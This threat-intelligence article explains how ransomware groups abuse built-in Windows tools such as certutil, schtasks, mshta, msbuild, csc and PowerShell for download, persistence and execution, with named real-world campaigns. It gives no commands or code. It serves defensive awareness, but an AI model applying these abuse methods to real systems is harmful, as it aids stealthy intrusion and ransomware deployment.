This month, our focus is on living-off-the-land techniques, and why they help ransomware threat actors execute attacks more stealthily. The concept of living-off-the-land (LotL) was first introduced by researchers to the broader security community in 2013, and has remained popular with threat actors ever since.
Common LotL Techniques
The binaries used in living-off-the-land are sometimes referred to as “LOLbins,” and a GitHub project, LolBas, keeps track of many of these binaries, and ways in which they can be used maliciously. I’ll provide a few examples of popular techniques, and how they can be used by ransomware threat actors in the wild.
Certutil (certutil.exe) is traditionally used for handling certificates, including backup, configuration, verification, and displaying their contents. Typically, certutil is employed by ransomware threat actors to download additional tools or stages of the malware.
To further help evade detection by antivirus (AV) software, the threat actor may base64-encode the file they download, and use certutil’s “-decode” flag to base64-decode it. This decoding can be used separately from the download functionality as well. DarkSide, the now-defunct group to whom the Colonial Pipeline attack in 2021 is attributed, has used certutil.exe to drop the ransomware binary onto victim systems.
The scheduled tasks functionality (schtasks.exe) allows system administrators to manage scheduled tasks, including those on both local and remote computers. Primarily, schtasks.exe can be used maliciously to aid in the execution or persistence of ransomware.
For example, creating a scheduled task was used as part of establishing a persistence mechanism by ALPHV and BlackMatter ransomware groups, according to researchers at Cisco Talos. Additionally, at a higher level, a threat actor with access to Active Directory (AD) can modify the Group Policy to create a scheduled task to execute ransomware on all machines across the domain. This allows them to quickly deploy the ransomware, decreasing a defender’s chance of stopping the attack.
In the wild, actors will most likely exploit this functionality as part of phishing, in which a link to download or .HTA attachment containing malicious code is sent to a victim, the victim clicks on it, and mshta.exe executes it.
As part of its BazaCall campaign, the actors behind BazarLoader deployed Microsoft Word documents containing macros that used MSHTA to download the malware. BazarLoader has historically been used to deploy ransomware, including Ryuk and Conti.
Microsoft Build Engine and C# Compiler
Microsoft Build Engine (msbuild.exe) and the C# compiler (csc.exe) are built-in Microsoft tools for building applications. Visual Studio uses csc.exe and msbuild.exe as parts of its build process; the “project files” (such as .csproj, .vbproj, and .vcxproj) contain MSBuild XML code that executes when the build process starts and the code is compiled.
Threat actors can use these tools maliciously as well, primarily to aid in execution of code. For example, if a threat actor drops a malicious C# code file which may evade AV while the compiled version would not, they can use csc.exe to compile the code, and later run it by some other means. Or, using msbuild.exe, the threat actor can build and execute malicious code stored as a C# project in a .csproj project file.
In 2021, researchers at Anomali observed threat actors using MSBuild to deliver Remcos RAT and Redline Stealer. This is a popular credential stealer whose logs can be used by threat actors to gain or increase access to victim systems, prior to deploying ransomware.
Similarly, the actors behind WastedLocker used C# compiler when delivering payloads to other systems in the compromised victim network.
PowerShell, the built-in Windows command line and scripting tool, is a LOLbin that truly deserves its own category. PowerShell offers substantial capabilities to ransomware threat actors, including downloading additional tools, deobfuscating and executing payloads—even functioning as the programming language used to develop the ransomware itself.
- SharpHound is an AD enumeration tool that allows threat actors to look for a route to elevated privileges on an AD domain they have compromised; in addition to a C# payload, a PowerShell version of the tool can also be used to collect this information.
- Cobalt Strike, the extremely popular post-exploitation tool used by ransomware and state-sponsored actors alike, allows threat actors to deploy a PowerShell payload to a victim system. This payload is executed in memory, rather than dropped to the disk, making detection somewhat more complicated for defenders.
- Empire is another multi-functional post-exploitation tool that, among other functionalities, allows a threat actor to execute PowerShell commands.
The Future of LotL
Ransomware threat actors will very likely continue to use LotL techniques, like those discussed here, as part of their attacks on victim networks. While the specific groups employing them will change, threat actors will shift to new operations, and as the techniques remain successful, will continue to use them.
While this discussion focused on the usage of benign Windows tools, the definition can be more broadly applied to any application or utility that a threat actor did not explicitly develop but can use to conduct malicious behavior. A few examples include third-party administrative software that can be used to drop additional tools, abusing collaboration apps for C2 or delivery, or employing benign compression utilities to encrypt victims’ data. As a result, we’re likely to see additional legitimate tools used, or other tools used in new ways, to enable threat actors’ malicious goals.